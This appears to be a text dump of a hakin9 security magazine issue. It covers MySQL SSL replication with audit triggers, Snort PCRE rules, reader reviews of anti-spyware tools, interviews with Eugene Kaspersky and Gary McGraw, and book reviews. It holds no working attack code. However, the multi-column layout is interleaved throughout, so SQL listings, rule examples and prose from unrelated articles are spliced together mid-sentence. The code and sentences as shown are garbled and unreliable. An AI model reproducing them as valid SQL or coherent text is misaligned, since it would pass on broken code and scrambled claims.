MASTER_LOG_POS=636;
set up and the administration effort
had to be kept low.
# mysql -u root -p
mysql> grant replication slave on *.* to 'sslreplicate'@'192.168.103.1'
identified by 'slaveXp4sswd' require SSL;
mysql> flush privileges;
www.hakin9.org/en
Defence
file or, and this is the officially re- console. To make things simpler, cal because it is easy to edit and
commended way, setting the new the change master command can can be used on the other server
parameters by using the change be stored in a text file, as shown in with only a few changes. Some
master t command in the MySQL Listing 5. The text file is very practi- important commands to control the
slave are presented in Listing 5.
Listing 8. Create error tables stop _ slave; stops all running slave
# mysql -u root -p threads. start _ slave; starts them
again. With the commands start _
mysql> use db;
slave _ sql _ thread ; and start _
mysql> create table if not exists t_errors (errorid smallint unsigned not
slave _ io _ thread ; the threads
null auto_increment, errorcode smallint unsigned
not null, errorcomment varchar(100), primary can be started independently. The
key(errorid)); output of show _ slave _ status; is
mysql> create table if not exists t_errortext (errorcode smallint unsigned shown in Listing 6. It displays all
not null auto_increment, errortext varchar(100),
current settings. MASTER _ LOG _ FILE
primary key(errorcode));
mysql> insert into t_errortext values ('', 'UNAUTHORIZED INSERT on table
and MASTER _ LOG _ POS are indicat-
t_vulnerabilities'); ing the current reading position of
mysql> insert into t_errortext values ('', 'UNAUTHORIZED UPDATE on table the I/O thread on master side. The
t_vulnerabilties'); values can be looked up on the
mysql> insert into t_errortext values ('', 'UNAUTHORIZED DELETE on table
master by executing the command
t_vulnerabilties');
show _ master _ status;.
mysql> quit;
Before starting the slave threads,
Listing 9. Create trigger a user has to be created so that the
slave can connect to the master. For
mysql> drop trigger tr_vulnerabilities_insert;
replication purposes only the right
mysql> drop trigger tr_vulnerabilities_update;
mysql> drop trigger tr_vulnerabilities_delete;
replication slave is mandatory, as
mysql> DELIMITER $$ shown in Listing 7.
mysql> create trigger tr_vulnerabilties_update BEFORE UPDATE ON t_ Assuming the text file men-
vulnerabilities tioned above was updated cor-
> FOR EACH ROW
rectly, the command mysql -u root
> BEGIN
-p < setMaster.txt can be executed
> IF NEW.vulnid != OLD.vulnid THEN
> INSERT INTO t_errors values('',2,CONCAT('old id: ', CAST(old.vulnid on the Linux command shell to
AS CHAR), ' -> new id: ', CAST(new.vulnid AS CHAR))); configure and start the slave. As
> SET NEW.vulnid = OLD.vulnid; explained at the beginning of the
> END IF;
article, MySQL is using two unidi-
> END;$$
mysql> create trigger tr_vulnerabilties_insert BEFORE INSERT ON t_
rectional connections, so this com-
vulnerabilities mand has to be executed on both
> FOR EACH ROW servers. To be sure that all worked
> BEGIN well, typing show slave status;
> IF strcmp('appuser@localhost', USER()) != 0 THEN
should reveal an output contain-
> INSERT INTO t_errors values('',3,CONCAT('vulnid: ', CAST(new.vulnid
AS CHAR)));
ing the line Waiting for master to
> INSERT IGNORE INTO t_errors (errorid, errorcode, errordetails, send event. Errors during connec-
nonexistentcolumn) values('',3,CONCAT('vulnid: ', tion set up are logged by syslog in
CAST(new.vulnid AS CHAR))); /var/log/syslog. In some cases it is
> END IF;
convenient to test the connection
> END;$$
mysql> create trigger tr_vulnerabilties_delete BEFORE DELETE ON t_
by connecting manually to the mas-
vulnerabilities ter server:
> FOR EACH ROW
> BEGIN mysql -h 192.168.103.1 -u sslreplicate
> IF strcmp('appuser@localhost', USER()) != 0 THEN
–ssl-cert=/etc/mysql/ssl/client-
> INSERT INTO t_errors values('',4,CONCAT('vulnid: ', CAST(old.vulnid
cert.pem –ssl-key=/etc/mysql/ssl/
AS CHAR)));
> INSERT IGNORE INTO t_errors (errorid, errorcode, errordetails, client-key.pem –ssl-ca=/etc/mysql/ssl/
nonexistentcolumn) values('',3,CONCAT('vulnid: ', ca-cert.pem -p
CAST(old.vulnid AS CHAR)));
> END IF;
Replication
> END;$$
mysql> DELIMITER ;
on Column-level
Two MySQL databases are now
up and running, exchanging their
1-917-338-3631
2. Online
Order via credit card just visit:
www.buyitpress.com/en
3. Post or e-mail
Complete and post the form to:
Order information I understand that I will receive 6 issues over the next 12 months.
Credit card:
(□ individual user/ □ company) □ Master Card □ Visa □ JCB □ POLCARD
Title □ DINERS CLUB
Name and surname
Card no. □□□□ □□□□ □□□□ □□□□ □□□□
address Expiry date□□□□ Issue number □□
□□□
Security number
postcode □ I pay by transfer: Nordea Bank
tel no. IBAN: PL 49144012990000000005233698
email SWIFT: NDEAPLP2
Date Cheque:
□ I enclose a cheque for $ ____________________
Company name (made payable to Software-Wydawnictwo Sp. z o.o.)
T
his month’s article is continuing our series on threshold:type threshold, count 5, seconds 60, track
Writing Snort Rules. Last time we talked about by_src; classtype:not-suspicious; sid:1000001; rev:3;)
This is going to catch any packet in an established ses- classtype:not-suspicious; sid:1000001; rev:4;)
cases as an analyst we care when a thing happens, but flow:established,to_server; content:”abc12”; nocase; pcre:”/
do not need to know about all 500 times it happens in abc12\d/i”; classtype:not-suspicious; sid:1000001; rev:5;)
way the PCRE is only used when there’s most of the We want to catch the strings abc and 123, but we sus-
string already detected. pect there may or may not be up to two characters in
between. We might see abcxx123, or abcd123, etc. The
pcre:”/abc12\d/i”; above rule uses two content matches and a within to find
us a packet that’s close.
The PCRE syntax includes the opening and closing / as Within 5 says that the second content match must
is usual outside of Snort. In this case the \d tells PCRE to be wholly included within 5 bytes past the end of the
match on any single digit in that position. Here we have last match. That gives us the up to two unknown bytes
included a modifier after the trailing slash; i for case between the abc and 123. If the packet is this close, then
insensitivity. All of the usual PCRE modifiers are avail- we use PCRE to make sure the bytes between there are
able, and there are three Snort specific modifiers that are actually characters and not whitespace, etc. The \w* will
quite important. match on any or no characters, but not whitespace.
To match against the HTTP preprocessor normal- That is it for this hakin9 edition. In the next article we
ized buffer use the U modifier. To match relative to the will get deeper in to the more complex Snort directives,
last pattern match use R . Use B to match against the including byte _ test, byte _ jump, and others.
raw payload similar to the rawbytes statement for con- We have gotten some great emails and feedback
tent matching. Let us consider a more complex situation on the regular articles in this series.
PCRE can solve for us. Please feel free to contact the author directly with
any questions: jonkman@bleedingthreats.net, and
alert tcp any any -> 192.168.1.1 any (msg:”Test Signature”; join the Bleeding Edge Threats Community at http:
flow:established,to_server; content:”abc”; nocase; content: //www.bleedingthreats.net. l
”123”; within:5; pcre:”/abc\w*123\d/i”; classtype:not-
suspicious; sid:1000001; rev:7;)
A D V E R T I S E M E N T
Consumers tests
D
ear Readers, we are pleased to present the things that Microsoft Defender missed. I have also run
opinions on anti-spyware software provided Microsoft Defender after running Spybot and it will detect
by our readers and partners. The hakin9 team things that Spybot has missed. For me it is a defense in
would like to thank all the contributors and depth thing. After running Spybot and Microsoft Defen-
encourage the others to take part in our upcoming tests. der I will run Ad-Aware just to clean up tracking cookies
Willing to fulfill your expectations, we would like YOU to and too double check the machine for spyware.
suggest what products you wish hakin9 to test next. We Since I have been using the anti-spyware programs, fir-
have already had tests on: Firewalls, Antivirus Software, stly I have tried Spy Cleaner and PestPatrol. It was more of
Data Recovery Software, Routers and Security Scanners. an experiment to see if there were any other anti-spyware
All contributors might expect nice presents from programs that were better than what I had. The reason that
hakin9 in return for their help. I did not go with them was more of a personal preference.
They were no better and not any worse than what I was using.
Opinions Being a user of anti-spyware software I have considered pro-
ducts from Symantec, Trend Micro and McAfee. But all of the
Nod32 programs that I use are free as long as they are for personal
I have been succesfully using Nod32 Antispyware for use. Additionally, they are good programs that I am comfor-
some time now. I have tried many other applications table using them. Why pay then for something that may not be
(Spyware Doctor, AVG Anti-Spyware, Spybot) but Nod32 as good as what I currently have.
have proved to be the most useful and reliable one. All three packages give me defense in depth on my
It is fast, needs low computer sources (CPU, memory machine as far as anti-spyware goes. I run scans on my
etc.), good quality comparing to other products (i.e. machine at least weekly and am amazed at what the pro-
AVG). There is always a possibility to improve but Nod32 grams will find in that week timeframe. I really do not see
does a good job. It works fine – I have not experienced any weak points other than the fact I have yet to find an
any problems due to spyware, viruses etc. Nod32 is quite anti-spyware program that will detect all versions of spy-
user friendly from my point of view and the implemen- ware. It would be nice to have one spyware program that
tation was very easy. It works with Win(workstations)/ is the Holy Grail of anti-spyware that would detect every
Linux(File/Email Servers) and it works quite good with form of spyware. Until that day arrives I will use multi-
MS Outlook for example. The database is regularly upda- ple programs. Up to now, I have not had any problems or
ted, sometimes, even several times per day, depending hang ups with any of the software. They all run just fine.
on the virus activity. It is a little bit more expensive (than To conclude I would like to add that unless an all in
let’s say AVG) but I guess it is much more effective so it one anti-spyware product would be released to catch
is worth to pay more. I would choose Nod32 again. It is everything I will surely stick with it. Moreover, I recom-
fast, has low memory load, fast virus database update. I mend all three packages’ to friends, family and fellow
would be very glad if my company switches from McAfee workers. I also recommend the defense in depth appro-
anti-spyware to Nod32 because it uses too many compu- ach that I use. At present, the market does not have a fix
ter sources and slows the computers down. McAfee is a all antispyware program. Even if a user is using a com-
very dissapointing product, maybe the worst I have ever mercial grade antispyware program I would recommend
had. I always hope that AntiSpyware works pretty good, running one or two of these programs after running the
but the greatest responsibility lies with the users. commercial product. I believe that most people would
be surprised at what the average antispyware program
Notes: misses. And keep in mind the defense in depth strategy.
I highly recommend all three of these products as they
• quality/price – 9 have kept my computer systems safe for many years.
• effectiveness – 9 There are a lot of antispyware programs out there both
• final – 9 commercial and free. Find two or three that you are com-
by Ferdinand Urban fortable using and most of all keep it updated and use it
regularly.
Spybot, Microsoft Defender and Ad-Aware
Currently I use 3 antispyware programs, which are: Notes:
Spybot, Microsoft Defender and Ad-Aware as my third
layer of defense. • quality/price - 10
The reason why I chose to use these 3 programs is • effectiveness – 10
because over the years I have found that one antispywa- • final - 10
re program will not detect all spyware running on a machi- by Steve Lape
ne. There are times when I run Spybot and it will detect CISSP, CCSO
Symantec Anti-Spyware for help on their totally dead machine I can recommend
Antispyware has come a long way in the past few something to them, that doesn’t cost the earth. AVG Free
years. I have used products such as spybot, Lavasoft’s Edition, only protects against virii, but their pay for version
Ad-Aware, and CA’s Pest Patrol. We have been using also includes the following;
Symantec for quite a long time in my corporation. Howe-
ver when we first started running into issues of spywa- • Anti-Spyware
re, we were picking them off one at a time with whatever • Firewall
application the tech that had to clean it preferred. Pretty • Anti-Spam
soon we had copies of Microsoft Antispyware, Ad-Aware, • Anti-Rootkit
or spybot everywhere. There was no manageability of the
updates, or where things were. We decided to look into an AVG hardly uses any resources on my machine, and upda-
enterprise wide solution. tes regularly enough to keep me safe, when I am venturing
When reviewing the failure of Pest Patrol, and conside- out in the wild unknown areas of the Internet. With full on-
ring the upgrade to the new version of Symantec Antivirus, access protection, any file I open, run or save is scanned. If
we realized it came with an Anti-spyware as well.. I was a little the file in question is infected, AVG won’t let me do anything
hesitant at first, but it really turned out to be for the best. Since with it, unless I tell it to do so. Even my email is protected!
we are already running Symantec Antivirus, it was just upgra- One of the downsides I have found is that it only supports
ding to a new version. We rolled out the Ant-spyware under Windows based platforms, and some of my friends would-
a controlled environment. It was easily centrally managed. It n’t touch that with a barge-pole! I have been using it for
was also nice because we had the Antivirus sending email a couple of years now, and recommend it to all my friends
alerts to us when a person had a virus, so when they picked and family whenever they say theirs is running out. Wish all
up spyware it sent an email as well. If you are familiar with software this good was free! (for personal use).
Symantec AV, then you know that you can spread the load
onto multiple servers, as well as setup groups to manage dif- Notes:
ferent Antivirus/Antispyware profiles. Symantec also does a
great job of rolling out updates and new signatures. You can • Quality/Price: 10/10
set the server to download the updates, update a specific test • Effectiveness: 9/10
bed of PC’s then role it out enterprise wide. Or you can just • Final note – there is sometimes such a thing as a free
set everything to roll out automatically. One problem I have lunch!
with Symantec Antivirus, or really any antispyware/antivirus, by Michael Munt
is some applications touch a lot of files and if the product is
set to scan files on open it could slow the PC down, so you Spybot
end up excluding a folder so the application will run the way I chose Spybot – Search & Destroy for a very simple
the end-user expects. This of course leaves a gaping secu- reason – it is free and still it offers up-to-date spy- and
rity hole. In IT we generally don’t get to chose the software ad-ware bases. One cannot say anything like this about
the user runs, so its not something that can be fixed, but it is other free programs that usually get forgotten by the
annoying. author right after the free full version release. Additional-
ly, I employ Ad-Aware which is free and regularly updated
Notes: as well. I do not think any of these two programs is better.
They just complete each other perfectly. After scanning
• Quality: 8 the PC with the two applications I can be sure I got to
• Price: 9 (if you already have Symantec Antivirus) know of all the spy-ware threats that might have nested
3 (if you do not have Symantec Antivirus) in my machine. I was considering buying a full Ad-Aware
by Jason Carpenter version for a while. I resigned though, as the free edition
works really fine, especially supplemented by Spybot.
AVG Anti-Virus Free Edition Spybot – Search & Destroy is a small program that
Using AVG Free Edition has saved my pc from infection on I can upload to my pendrive or download from the Internet
more than one occasion. I used to use the Anti-Vir, but then whenever and wherever I am. It is very important in my job
I started having updating problems and this forced me to for, each time, I need it in a different place and in a different
look around and find another product (it isn’t safe to have an machine. Another big plus of Spybot is its speed. It takes
unprotected machine these days). Most people recommen- only a while from the beginning of the installation and the
ded the usual pay for products (McAfee, Norton, F-Prot etc), software is updated and ready to go. Scanning itself does
but I have always been of the mind that decent software can not take too long either and still is really effective. Low
sometimes be free, and I will always check free solutions repair possibilities are the main disadvantage of the pro-
first. This way when friends and family come a-knocking gram. The only repairing option is deleting the dangerous
objects... While it is enough in case of cookie files and regi- eper worth the $30. The thirteen Shields include protecting
stry entries, it is not when dealing with some more elabo- your hosts file and even monitoring email attachments. When
rated spyware (that has infected a file, for example). Then, I tested out one of the spam links that I received in my email,
deleting does not solves (solve) the problem completely within seconds my browser canceled the page from loading
and can even make the situation worse. The greatest and a friendly pop up in the middle of the screen alerted me. It
inconvenience related to Spybot usage was ... the system was no mystery, Spy Sweeper’s Real-Time Protection saved
failure. It stemmed just from my unconcern though. Witho- me from a malicious site. From installation to completing mul-
ut checking what threats Spybot found, I let it delete all of tiple full system scans, there were no hiccups. If an update is
them. The effect was obvious – the system wouldn't start missed for whatever reason, an alert will notify you and make
off. It is worth remembering that before deciding to cure it sure the latest library updates are downloaded. Spy Swe-
is better to see what Spybot will cure and whether deleting eper has turned out to be the complete package I needed.
it is OK. Sometimes it is better to look for a different solu- It proved to be quite effective and is simple enough for me
tion and treat Spybot simply as the information source. to recommend to the average users who are exposed to the
Basically, Spybot – Search & Destroy is a great pro- same threats but are not as security focused.
gram for those who want to save their time and money.
It ensures a good protection from any spyware but Notes:
demands carefulness when pressing the Repair button (it
gets read of the problem literally). I have been using it for • Quality/price: 8
a while both at work and at home and I am not going to • Effectiveness: 9
look for anything else for the time being. • Final, general note: 9
program, I found out another hundred. It is good to know that re which we are currently using on my job in the corporate
it was worth buying. Why Ashampoo? It is a world known version. The standalone commercial version is excellent but
brand and in a contrary to free SUPERAntiSpyware, it offers has gained a reputation as requiring significant system reso-
a real time guard, automatic signature update, series additio- urces to run. I have also evaluated CounterSpy by Sunbelt
nal tools and other features. Program update seems to be a Software which is another commercial program. It is a very
weak side of the code. The computer hung up twice. Consi- good program overall but in my opinion it does not offer the
dering a lack of a recent hard drive format and the matter of range of options provided by Spyware Terminator. I am quite
the first Internet login it was not a surprise. No subsequent satisfied with the performance of Spyware Terminator altho-
breakdowns. Besides, the preferences screen lacks two last ugh like in most free software there are some rough edges
letters in the files and others menu. A problem may be long which must be accepted. A freeware program typically must
time scanning too. I am going to continue using Ashampoo. I eventually develop some type of revenue stream and depen-
would recommend it to other end-users. Quality gives a price. ding on how this is handled the software can become intru-
Extreme effectiveness make us happy. The goal is stay away sive in some cases. I recently ran a deep scan using Spywa-
from every harmful code coming from the Internet. re Terminator with Clam AV active. Scanning was slow pri-
marily due to Symantec Corporate AV version 9 running on
Notes: the PC. This corporate AV software could not be disabled
and slowed down the scan considerably. Spyware Termina-
• Quality/Price: 6 tor with Clam AV scanned 149,000+ files in about 3 hours
• Effectiveness: 8 and found 6 critical objects. This scan was run on a machine
• General: 8 where I have periodically ran scans using various other anti-
By Piotr Paweł Czumak spyware products. Prior to running the Spyware Terminator
(with Clam AV) deep scan I had ran a Trend Micro House
Spyware Terminator by Crawler Call thorough scan online which found only 1 critical object.
I had previously been using version 1.9.2 of Spyware Termi- Symantec Corporate AV version 9 which was running on the
nator but for the purposes of this review I upgraded to version machine continually, had failed to identify any of the 6 critical
2.0. I chose to use this software for a number of reasons: objects found by Spyware Terminator. Spyware Terminator
successfully cleaned all of the critical objects and a repeat
• It is free deep scan showed no current threats found.
• It runs scheduled scans I believe the main strong points of Spyware Terminator are
• It regularly downloads updated spyware definitions its very thorough malware scan (especially in combination with
• It scans at a relatively quick pace when installed Clam AV), its scheduled scans and automated definition upda-
without any conflicting AV software tes, and the fact that it is free. It also provides real time protec-
• The interface is uncluttered and appealing tion and is compatible with Vista. The downside centers around
• It includes a real time protection option with selectable the Web Security Guard feature which is designed to provide
shields a safe browsing experience. Due to some questionable prac-
• There is optional integration with Clam AV, a free anti- tices associated with selecting this option I do not recommend
virus program which was recently purchased by Snort using it. For example, installation of the Web Security Guard
• There is an option for a Host Intrusion Prevention feature automatically installs a web tool bar called Crawler
System (HIPS) which has not been selected by the user and which tracks the
• There is an option for Web Security Guard which is user’s browsing habits. Another apparent limitation is the lack
designed to provide safe browsing of flexibility in choosing which of the critical objects to process.
• There is an option for System Restoration It seems that you are only able to process all of them or none
of them. Other similar programs generally provide more flexi-
I have previously used a variety of anti-spyware software. bility when using this feature. In my opinion, Spyware Termina-
When spyware first began to become a significant problem tor with Clam AV enabled and without the Web Security Guard
it was pretty much accepted that one program alone was not feature is a very effective malware tool. I have already recom-
sufficient. At that time I routinely used Adaware and Spybot mended this program to several friends who have been very
Search and Destroy together so that their individual streng- satisfied with both its performance and price.
ths and weaknesses would be better balanced. Later on, as
Spyware became more sophisticated I started using the Anti- Notes:
Spyware software produced by Giant Software which was
free and which I found to be an excellent tool. However, after • Quality/Price: 9
their purchase by Microsoft the quality of the program dete- • Effectiveness: 9
riorated significantly in my opinion. At that point I switched to • Overall Score: 9
SpySweeper by Webroot which is the commercial softwa- by Donald J. Iverson
hakin9 team: Could you, please, introduce market. We are already seeing an impressive
yourself to our readers? success in the retail (home user) market, but
Eugene Kaspersky: My name is Eugene now it is time to win the hearts of businesses.
Kaspersky, and I am the founder and CEO of We have some great corporate products, and
Kaspersky Lab (established in 1997), one of they are quickly attracting more and more
the leading developers of secure content man- clients among companies all over the world,
agement solutions in the world. For the last from Australia to Sweden.
18 years I have been dealing with computer Besides, we are planning to continue de-
threats – starting from conventional viruses veloping our hosted security services for com-
back in 1989 and to modern complex and rap- panies. In some cases it is a very convenient
idly evolving Internet threats. solution for some businesses that cannot afford
h9: Please, reveal the secret about Kasper- to buy extra equipment and software and hire
sky's strategy for the next, 2008, year IT security specialists. I think it is a very promis-
E.K: First, we are determined to strengthen ing market.
our presence in all global territories. We are h9: What got you into computers in the first
already leading in the retail market in Europe place?
and the US (we are #1 in retail market in Ger- E.K: Initially computers got into my life
many, Austria and Switzerland, #2 in France, through my mathematics studies when I was
#3 in Spain etc.), but we still have to win a in high school. At that time, computers were
better position in Latin America, Asia, Middle considered to be a tool of pure mathematics,
East and Africa. and my educations included some training in
Second, technological advancement will computer science. But I saw my first virus
remain our top priority, and we will continue only several years later, in 1989, during my
developing world’s best anti-virus technolo- military service, where my duties included
gies. programming and I had an incredibly ad-
And third, in 2008 we are aiming to vanced machine for that times at my disposal
strengthen our positions in the corporate – an Olivetti M24. This machine was acciden-
tally infected with the notorious Cascade virus which ture, testing them and analyzing the allegedly malicious
was the first malicious program that I had analyzed and program in order not to add a threat signature for a harm-
made a cure for. less or useful software.
h9: Were you a kid blackhat like a lot of hakin9 readers h9: How do you intend to compete with the existing com-
were in the 80s-90s? petition in the anti-virus world?
E.K: No, never. In the late 80-ies and early 90-ies I E.K: It is a funny question, because we already com-
was already working on computer security, and this pete in the anti-virus world. Actually, our company is
excludes any blackhats and hacking. Besides, I believe currently number 6 in the global secure content man-
that this is a black and white universe – if you have tried agement market, and in 2008 we hope to ascend to the
illegal hacking once, you will never be able to return to 5th place. But this will not be the last goal for us.
the good side and protect people. At least I had never h9: What to do against polymorphic viruses?
let a former hacker work in my company, although E.K: That is a good question that is not easy to an-
some of them send us their CVs from time to time. swer, because it is too technical. We use different
h9: There has been much criticism on signature based technologies against poly-viruses: emulation, skeleton
AV. Do you see this changing in the future? detection, statistics analysis, crypto methods and other
E.K: It is obvious that today, we see an overwhelming – depending on the polymorphic algorithm in each par-
stream of new malicious programs, and it becomes ticular case.
increasingly harder for all security companies to cope h9: Are there still a lot of anti-virus vendors whose prod-
with it. However, until now, we all manage to do it and ucts are based on signature detection alone?
all major companies are likely to deal with the threat E.K: Yes, there are still some of them but their approach
surge. And until now, threat signatures remained the is hopeless. They will have to catch up with the others
main and the most precise method to detect and neu- sooner or later or become a history, I believe. Signature-
tralize threats. Of course, heuristic- and behaviour- based detection alone cannot cope with thousands of
based detection becomes more and more important new malicious programs that we see every week, and
and effective, but I do not think that such methods proactive technologies become a necessary augment to
will be able to replace the signature-based detection signature-based detection.
completely. h9: What sorts of tools your company uses or what they
h9: How do you maintain accuracy in your AV signa- use to develop those tools?
tures? E.K: We use some of the common tools utilized by
E.K: If you mean: how we avoid the false positives, then other security companies. Some of our tasks, though, are
we use double- and triple-checking with all threat signa- unique (for example, we are the only ones who provide
hourly signature database updates), so we have to de-
velop and use our own tools. Say, we employ automatic
malware analyzers and heuristic analyzers of our own
design.
h9: Do you believe that a lot of researchers may have
created malware?
E.K: 25 years ago and even 15 years ago that used to
happen indeed, but not today. For instance, the first
desktop virus was developed in 1982 for the research
purposes – just to prove the concept that self-replicat-
ing malicious programs can exist. But modern virus
writers are not researchers or hooligans any more
– they are criminals and they pursue the very goal
that all the criminals do – money. All most widespread
sorts of malware were developed for the sole purpose
– to generate illegal revenue. Credit card password
stealing, hired DDoS-attacks, spam – these are only
a few instances of how malware can be profitable.
All that had to be researched in this field is already
researched. Now they are just implementing their
knowledge.
h9: Thank you very much and good luck! l
hakin9 team: Could you please introduce describe and discuss in the book are a harbin-
yourself to our readers? ger of software security issues to come as the
Gary McGraw: I am Gary McGraw, CTO of world embraces SOA and Web 2.0 designs.
Cigital and software security expert. I’ve been h9: Could you tell me about the stages of your
working in computer security since 1995 when professional career?
I got my Ph.D. from Indiana University. I got GM: I started my career after I got my dual
started thinking about programming languages Ph.D. in Computer Science and Cognitive
and security when Java came out and wrote the science from Indiana. When I was a student,
book Java Security (Wiley 1996) with Ed Felten I worked with Douglas Hofstadter (author of
from Princeton. Soon after that I became very Gödel, Escher, Bach) and concentrated on AI
interested in knowing why it was that amazingly and cogsci. I joined Cigital straight out of school
good architects, developers, languages people, as a research scientist.
etc were so clueless when it came to security. When I was hired in 1995, Cigital was doing
Looking around, it became clear that there was lots of research for the U.S. government. I was
not much work published about software secu- hired to work on a grant from DARPA. The grant
rity so I wrote Building Secure Software with was investigating the application of software
John Viega in 2000. fault injection to computer security. Eventually,
BSS touched off a paradigm shift in compu- I published a book on this work with Jeff Voas
ter security. Since then I’ve published a number called Software Fault Injection (Wiley 1998). As
of books helping to steer that field’s evolu- part of my career I wrote lots of grants and pub-
tion, including Exploiting Software (with Greg lished many scientific papers (over 100).
Hoglund) and Software Security. This early scientific research got me inter-
As you might imagine, Exploiting Online ested in computer security right around the time
Games has plenty to say about software se- that Java was coming out. Being a programming
curity. From my perspective as a scientist, the languages guy, I took great interest in Java.
most interesting thing about online game secu- Together with Ed Felten from Princeton, I wrote
rity is that the kinds of problems and issues we Java Security (Wiley 1996) and Securing Java
h9: How long have you been working for Cigital? What h9: What are your future plans? Do you plan on writing
kind of company is it? any new books soon?
GM: Cigital (http://www.cigital.com) is a consulting firm GM: I always like to take a small break to catch my breath
of over 100 people concentrating on software security between books. I do have a project underway now, but it
and software quality. We deliver professional services is going pretty slowly. I’m working on a book about secu-
that help our customers build software that works. Our rity principals (like the principal of least privilege) but with
specialty in software security is unrivaled. lots of specific code. The idea is to make the philosophy
Back when we started delivering software security of security tangible so that developers better understand
services (including architectural analysis and code re- risk management tradeoffs.
view) in 1997, there was not very much demand. Ten h9: What features are the most important for a person
years later, demand is huge and Cigital is growing very who is going to look for a job in the software security field
rapidly. We’re always on the lookout for great people. some day?
One of the unique aspects of Cigital is the people. GM: Software security is just as much about software as it is
People at Cigital are smart, driven, and motivated to about security. In order to be a great software security per-
make a big difference in software behavior. We spend son, the first step is to learn to program. People with several
lots of time training internally for career development and years of coding experience make the best software security
working together so we learn from each other. types, especially if they have a knack for software architec-
h9: What security products (antiviruses, antispywares, ture. THat’s because if you want to practice software security,
firewalls, etc.) do you use to secure your home com- you need to understand compilers, programming languages,
puter? and other things that software people live with every day. A
GM: I have an iMac at home thanks to my 12 year old degree in Computer Science often helps someone to attain
son Jack. It sits on a satellite internet link protected by this background. On the security front, I have found that the
ISP firewalls. Our house and barn are lit up with Wi-Fi. best security people are the kinds of people who love taking
We also have a few leftover PCs and laptops all of which things apart to see how they work (even if that sometimes
run Norton anti-virus and personal firewall software. In all means breaking things). Those kinds of people have an
of the years I have been using computers (since 1981), I easier time thinking like a bad guy than others. The trick to
have only had a virus problem once. security analysis is to put yourself in the attacker’s shoes
Honestly, I don’t think much about computer security for and see a system from new angles. Try out the „can’ts” and
my home machines. We’re careful about web use and what „won’ts” and often a system will fail in spectacular ways. If
software we run, but no more than everyone these days. you combine deep software knowledge with the capability to
h9: What do you think about current IT security situation? see the attacker’s perspective, you can develop into a very
What are the weakest and strongest points? Do you have solid software security practitioner. As you gain experience,
a particular vision of IT security in the future? it’s important to also develop a focus on understanding how
GM: As you might imagine, I am a big fan of software businesses operate. To carry out risk management properly,
security. The good news is that we’re making very good you must determine why a system is being built, and more
progress in software security, and slowly but surely de- importantly who might want to attack it. Large scale software
velopers are coming to understand what they need to do security programs require even more business acumen be-
to help. Ten years ago when I started in software secu- cause an enterprise software security initiative is as much
rity this was not the case. So I am very pleased with the about cultural change as it is about technology.
progress we are making. h9: And finally, could you give some pieces of advice for
I think software security remains a weak point in our readers – people who might be going to look for a job
IT security, but I am optimistic that we’re making good in IT security field some day?
progress in that area. The more we can do to educate GM: Absolutely. I would encourage any developers and
developers and architects about security, the better off architects out there to get into software security as soon as
we’ll be in the long run. possible. Pick up a copy of Software Security (or if you’re
h9: What specific improvements would you like to see in psyched for fun, get Exploiting Online Games) and see what
the field of software design in the future? you can learn. The demand for software security profes-
GM: I would like to see the advent and use of better pro- sionals is growing, and boy do we need as much help as we
gramming languages. I think if we got rid of C and C++ can get! If you are a traditional IT security person or network
(which are awful from a security perspective), we would administrator, spend some time thinking about the software
eradicate entire classes of security bugs. Then we could that you rely on. Ask hard questions about security and get
concentrate our efforts on security architecture. your vendors to do a solid job when possible. Do what you
Software design and architecture takes serious ex- can to reach out to your developers and get them interested
pertise, and doing those things with security goals in in software security as well. If I were just getting started in
mind is the key to software security. One of the best prac- IT, I would focus my energies on software. I believe software
tices I describe in Software Security is architectural risk security is the future of computer security. l
analysis. I would like to see more people doing that. Interviewed by Monika Drygulska
Title: Fuzzing. Brute Force Vulne- • Covered both Windows and Unix fuzzing tools and
rability Discovery concepts.
Author: Michael Sutton, Adam • All fuzzers made by the authors were provided with a
Greene, Pedram Amini thorough explanation as to why the specific language
Publisher: Addison-Wesley Press was chosen, how the fuzzer was to be used, how it
Pages: 576 was going to be applied to the chapter, etc.
Price: $54.99 • Quotes at the beginning of each chapter added a
touch of humor and made for an enjoyable read.
• Case studies were located on all but a few chapters
Fuzzing, what exactly is it? Well, that is the same question I giving the reader a real-world example to follow by.
asked myself a few months back and decided it was time to • Authors encouraged the reader to write their own
find out. I wanted something that would show me a step-by- fuzzer by simplifying the subject.
step approach to the subject I felt was so daunting. Fuzz-
ing: Brute Force Vulnerability Discovery is without a doubt Cons:
that book. Fuzzing was written not by one author, but by
three extremely credible sources all proficient in the field of • Some cases studies were not as in-depth as they could
security research. The book makes fuzzing approachable, have been (Chapter 10, Chapter 15, Chapter 18).
it splits the book up into four sections, Background; Targets • There were no numbered lines on the code snippets,
and Automation; Advanced Fuzzing Technologies; Look- sometimes making it frustrating when trying to do the labs.
ing Forward. Not only will each section entice you to read
more, the authors encourage you to apply your recently Overall, Fuzzing is a great book and definitely one for
acquired knowledge by using their tools along with tools anyone who is not sure what fuzzing is or how to approach
already available. Pros: it. The authors of this book did a wonderful job in making this
difficult concept of fuzzing easier to understand, apply and
• The book transitioned well. concur. Whether you have no experience or just want to get
• Code snippets were provided for each of the example. some hands-on examples, Fuzzing is the book for you.
• In most cases there was a theory chapter and then a
practical chapter directly following it. by Brandon Dixon
Title: Security Metrics. Replacing – Replacing FUD. The grey hat review. Difficult to place this
Fear, Uncertainty, and Doubt book in my library right now. The book does offer a wealth of
Author: Andrew Jaquith information but the information is geared towards the security
Publisher: Addison-Wesley Press manager if you ask me. Those studying for the CISSP, CISA
Pages: 299 will certainly enjoy this book and this book will offer them a
Price: $49.99 realistic scope of security practices, matrices, ROI, COO
information and guidelines. During day to day duties, I often
leave such subjects as Mean Deviations, Quartile Analysis
alone. Jaquith must have spent an enormous amount of time
I will give two different views on this book. The first coming as crossing his t's and dotting his I's when writing, his Delivery
a security professional (White Hat Hacker) often handed dif- and Support chapter is something CTO's alongside of CSO's
fering tasks outside of penetration testing, network analysis, should memorize, perhaps even copy the chart for baselin-
etc, then assisting in creating policies, formulating proof of ing. On the flip side of this, I can now understand and appreci-
concept secure designs for upper management and writing ate some of the tasks left to security managers and CSO's.
security policies and documents. The other comes from a However, I now have a better comprehension of where my
grey hat perspective. Jaquith gives an insightful perspective superiors are going when they often dish out mundane tasks
on security metrics and those delegated with the tasks of a such as having me prepare summary reports on my projects.
security manager or CSO will appreciate this book. Data Mod- For the penetration testers who might pick up the book, the
eling, Designing Security Scorecards and Application secu- Data Modeling section might come in handy for you. It gave
rity were my favorite chapters of the book since they were in me ideas on future pentest structuring – meaning, how better
tune with constant job functions that I'm used to. Many of the to prepare and disclose information after the work is done
